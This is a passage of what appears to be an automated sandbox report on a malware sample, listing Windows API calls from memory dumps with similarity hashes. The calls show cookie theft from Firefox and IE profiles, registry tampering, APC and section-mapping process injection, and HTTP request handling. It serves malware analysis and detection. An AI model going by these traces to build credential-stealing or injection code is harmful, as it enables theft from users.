    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
